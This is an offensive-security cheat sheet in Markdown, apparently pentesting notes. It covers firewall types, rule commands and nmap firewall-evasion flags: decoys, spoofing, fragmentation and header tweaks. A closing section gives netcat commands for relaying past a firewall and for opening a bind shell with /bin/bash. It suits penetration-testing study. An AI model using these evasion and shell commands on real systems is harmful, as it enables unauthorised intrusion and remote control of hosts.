109 lines
2.5 KiB
Markdown
109 lines
2.5 KiB
Markdown
|
# Firewall Handling and Bypassing
|
||
|
|
||
|
## Types
|
||
|
|
||
|
* Packet filtering
|
||
|
* Circuit level gateway
|
||
|
* Stateful inspection
|
||
|
* Proxy
|
||
|
* Next generation firewall
|
||
|
* Cloud firewall and FWaaS
|
||
|
|
||
|
## Rules
|
||
|
|
||
|
* Firewalls follow rules sets configured like in the example below
|
||
|
|
||
|
### Windows
|
||
|
|
||
|
```sh
|
||
|
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
|
||
|
```
|
||
|
|
||
|
### Linux
|
||
|
|
||
|
```sh
|
||
|
firewall-cmd --zone=public --add-port=57869/tcp
|
||
|
```
|
||
|
|
||
|
## Bypassing Firewalls
|
||
|
|
||
|
* IP/MAC/Port spoofing
|
||
|
* Fragmentation, MTU, data length
|
||
|
* Header modification
|
||
|
|
||
|
### nmap
|
||
|
|
||
|
* nmap contains multiple measures which can be used to circumvent firewalls securing the target we want to connect to.
|
||
|
|
||
|
#### Spoofing
|
||
|
|
||
|
* __Decoy__ `-D` , shuffle existing IP address with random adresses. Every port will be requested by any of these addresses.
|
||
|
```sh
|
||
|
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
|
||
|
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
|
||
|
```
|
||
|
* __Proxy__
|
||
|
```sh
|
||
|
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
|
||
|
```
|
||
|
* __Spoofed MAC__
|
||
|
```sh
|
||
|
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
|
||
|
```
|
||
|
* __Spoofed IP__
|
||
|
```sh
|
||
|
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
|
||
|
```
|
||
|
* __Port Number__, select a port which is whitelisted. Frequently this is 53,80,44
|
||
|
```sh
|
||
|
sudo nmap -F --source-port 443 $TARGET_IP
|
||
|
```
|
||
|
* __Fragmentation__, eth header + 20 bytes header size + bytes fragments via `-f`, or 16 bytes via `-ff`
|
||
|
```sh
|
||
|
sudo nmap -Pn -F -f $TARGET_IP
|
||
|
```
|
||
|
* __MTU__, works like fragmentation, `-f` == `--mtu 8`
|
||
|
|
||
|
```sh
|
||
|
sudo nmap -Pn -F --mtu 8
|
||
|
```
|
||
|
* __DATA Length__, eth header + IP header + prepend padding segment size to values of bytes
|
||
|
```sh
|
||
|
sudo nmap -Pn -F --data-length 64 $TARGET_IP
|
||
|
```
|
||
|
|
||
|
#### Header Fields
|
||
|
|
||
|
* __TTL__
|
||
|
```sh
|
||
|
sudo nmap -Pn -F --ttl 64 $TARGET_IP
|
||
|
```
|
||
|
* __IP OPTIONS__, `--ip-options` recordsas hex String
|
||
|
|
||
|
* Route, `R`
|
||
|
* Timestamp, `T`
|
||
|
* Route + Timestamp, `U`
|
||
|
* Loose source routing, `L $IP $IP $IP`
|
||
|
* Strict source routing, `S $IP $IP $IP`
|
||
|
|
||
|
* __Checksum__, craft bad checksum via `--badsum` to check errors
|
||
|
```sh
|
||
|
sudo nmap -Pn -F --badsum $TARGET_IP
|
||
|
```
|
||
|
|
||
|
#### Post FW
|
||
|
|
||
|
After the firewall has been bypassed there are further possible steps to gain foothold. One of them is to open a bind shell on standard ports which are usually not covered by firewall configurations like 443 or 80.
|
||
|
|
||
|
* __Hopping__, listen via netcat to catch that port
|
||
|
* __Tunneling__, relay open after passsing the firewall to connect to the closed port
|
||
|
```sh
|
||
|
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
|
||
|
```
|
||
|
* __Non standard ports__, open bin shell via
|
||
|
```sh
|
||
|
nc -lvnp 8888 -e /bin/bash
|
||
|
```
|
||
|
and connect
|
||
|
|